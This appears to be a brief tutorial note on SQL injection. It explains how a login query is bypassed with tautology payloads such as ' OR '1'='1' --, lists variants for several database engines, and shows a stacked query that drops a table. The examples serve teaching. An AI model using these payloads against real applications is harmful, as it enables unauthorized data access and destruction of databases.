1> SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server (also commonly referred to as a Relational Database Management System – RDBMS). (http://www.acunetix.com/websitesecurity/sql-injection/)
2> Examples
2.1 SQL query:
SELECT id FROM users WHERE username='username' AND password='password'
An attacker can also comment out the rest of the SQL statement (for example with --) to control the execution of the query further. With the username ' OR '1'='1' -- the above query becomes:
SELECT id FROM users WHERE username='' OR '1'='1' --' AND password='password'
- An SQL injection can destroy your database.
- SQL injection can give an attacker unauthorized access to sensitive data, including customer data, personally identifiable information (PII), trade secrets, intellectual property and other sensitive information.
- SQL injection based on 1=1 works because the condition is always true.
-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite
' OR '1'='1' --
' OR '1'='1' /*
-- MySQL
' OR '1'='1' #
-- Access (using null characters)
' OR '1'='1'
' OR '1'='1' %16
OR 1=1'
By using a single quote ('), for example username = ' OR '1'='1' --, the above query becomes:
SELECT id FROM users WHERE username='' OR '1'='1' --' AND password='password'
2.2 With the SQL query SELECT * FROM category,
the attacker can append a second statement with a semicolon (;), so the query becomes:
SELECT * FROM category; DROP TABLE Suppliers